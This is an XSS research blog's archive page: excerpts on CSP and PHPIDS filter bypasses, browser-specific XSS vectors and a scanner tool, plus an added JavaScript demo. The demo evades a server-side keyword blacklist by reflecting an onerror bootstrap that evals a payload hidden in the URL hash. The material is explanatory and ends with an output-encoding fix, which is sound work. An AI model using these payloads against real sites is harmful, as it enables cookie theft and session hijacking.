Archives for the ‘xss’ Category

Bypassing CSP for fun, no profit

I had fun at Confidence 2.0 CON, I’m gonna blog about the stuff I was holding back now. So I figured out how to bypass CSP with UTF-7 and JSON. Basically any site with a JSON feed that can be manipulated by an attacker (reflective or persistent) can be injected with even in a correctly escaped [...]

CSP – Mozilla content security policy

This is my cup of tea, a whole new way to prevent XSS and related attacks. I’ve been looking at the specification and I like the core of the policy: preventing external scripts, eval, etc. But reading it I started to think of ways around it because it’s fun. Meta tag: the meta tag seems [...]

New PHPIDS vector

No new PHPIDS vectors for a while? So I thought I’d write a new one as I had 5 minutes spare while drinking my coffee. I used a new technique (as far as I’m aware) to make things easier. A very old feature in IE is to allow events to be declared as VBScript using [...]

Opera XSS vectors

It turns out I was right. Originally I thought the protocols reported by my JavaScript fuzzer were false positives, but like lots of my code it seems to know better than me. I tested the context of the vectors in a normal HTML link, which didn’t work correctly. But I was messing with some [...]

onreadystatechange

I like this event, it’s pretty cool. The reason why it’s interesting from an XSS perspective is that it is executed automatically without user interaction. This is rare in the XSS playground; usually you have to use onerror, onload or onfocus events, and they only work in certain circumstances. I’d better mention that the event [...]

XSS Rays

I’ve developed a new XSS scanner tool written in JavaScript called XSS Rays for Microsoft. They have given me permission to release the tool as open source, which is awesome because it can be used for other open source applications. I recommend you use it as part of the web development process to make [...]

HTML5 XSS

I did a couple of vectors for PHPIDS recently and I was experimenting with Firefox 3.1 beta and the new HTML5 tags. I found the audio and video tags could be used for XSS; I’m sure there are others too. The vectors are quite cool because they’re executed automatically within an onload/onerror event. (Originally [...]

I know what your friends did last summer

I did report this to Twitter a few weeks ago, but now that Chris Heilmann has let the cat out of the bag I’ll post my repro now. Basically Twitter JSON security is leaking data; the JSON feeds that are publicly available shouldn’t be, IMO, or at least should be protected using known methods. So if you [...]

PHPIDS bypass

I haven’t hacked the PHPIDS for a while but David Lindsay (AKA Thornmaker) inspired me. When I say hacked I mean in a good way, because finding bypasses helps improve the filters. Here is my vector:- /Please submit the string\ to help us make the \ PHPIDS better./,y=('aler\ t'),x=this,x=x[y] x('I cant let you have all [...]

Location based XSS attacks

The basic attack: using the hash portion of the location is a good way to beat filters, because anything sent via the hash is not sent to the server in question. We can use a large amount of data which is hidden from the server-side filters and combine it with data sent to the server. [...]
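What the excerpt describes is a payload split in two: a small bootstrap that has to pass the server-side filter because it is reflected by the server, and the bulk of the attack carried after `#`, which the browser never puts on the wire. The block below is an added example for this archive page, not code from the original post: the blacklist filter, the reflecting endpoint at `victim.example`, the cookie value and the tiny stand-in for the browser are all constructed here; the one real fact it rests on is that the fragment is not part of the HTTP request-target, which is what `new URL(...).pathname + .search` reproduces.

```javascript
// Added example (not from the original post): a hash-based XSS split into the
// part the server must see and the part it never does. The vulnerable reflection,
// the blacklist, the cookie and the mini "browser" are constructed for this
// example; what is real is that browsers never send the fragment (everything
// after '#') in the request, so a server-side filter only ever sees path + query.

// Constructed blacklist of the kind server-side XSS filters use.
const BLOCKED = ["alert", "cookie", "document", "<script", "fromcharcode"];

function serverFilterBlocks(text) {
  const t = text.toLowerCase();
  return BLOCKED.some((w) => t.includes(w));
}

// The request-target a browser puts on the wire: path and query, fragment dropped.
function requestTarget(fullUrl) {
  const u = new URL(fullUrl);
  return u.pathname + u.search;
}

// Constructed vulnerable endpoint: reflects ?name= into HTML unencoded after
// running the blacklist over it. It can only filter what requestTarget() returns.
function serverResponse(fullUrl) {
  const u = new URL(requestTarget(fullUrl), "http://victim.example");
  const name = u.searchParams.get("name") || "";
  if (serverFilterBlocks(name)) return "<p>Request blocked</p>";
  return "<p>Hello " + name + "</p>";
}

// Attacker's link: a bootstrap in the query, the real payload in the hash.
function buildAttackUrl(queryPart, hashPart) {
  return "http://victim.example/profile?name=" + encodeURIComponent(queryPart) +
    (hashPart ? "#" + hashPart : "");
}

// Stand-in for the browser: pull out the reflected inline handler and run it with
// a location built from the FULL url (hash included) and a constructed document.
// src=x is assumed to fail to load, which is what fires onerror in a real browser.
function runReflectedHandler(fullUrl, html) {
  const m = /onerror=([^>]+)>/.exec(html);
  if (!m) return { ran: false, alerts: [] };
  const alerts = [];
  const location = { hash: new URL(fullUrl).hash };
  const document = { cookie: "session=deadbeef" };   // constructed victim state
  new Function("location", "document", "alert", m[1])(
    location, document, (x) => alerts.push(String(x)));
  return { ran: true, alerts };
}

function demo() {
  // Everything in the query: the filter sees "alert" and "document" and blocks it.
  const naive = buildAttackUrl("<img src=x onerror=alert(document.cookie)>", "");
  // Split: the query carries only a bootstrap that evals the hash; the hash
  // carries the blocked tokens and never reaches the server at all.
  const split = buildAttackUrl("<img src=x onerror=eval(location.hash.slice(1))>",
                               "alert(document.cookie)");
  const splitHtml = serverResponse(split);
  return {
    naiveBlocked: serverResponse(naive).includes("blocked"),
    serverSaw: requestTarget(split),               // no '#', no "alert", no "cookie"
    splitHtml,
    client: runReflectedHandler(split, splitHtml),
  };
}

console.log(demo());
```

`demo()` shows the naive link being blocked, the request-target the server actually receives for the split link (`/profile?name=%3Cimg%20src%3Dx%20onerror%3Deval(location.hash.slice(1))%3E`, with nothing from the hash in it), the reflected page, and the handler firing `alert` with the constructed cookie value. The server-side lesson is the one the excerpt implies: a filter that only inspects the request can never see the fragment, so the fix is output encoding at the sink, not a longer blacklist.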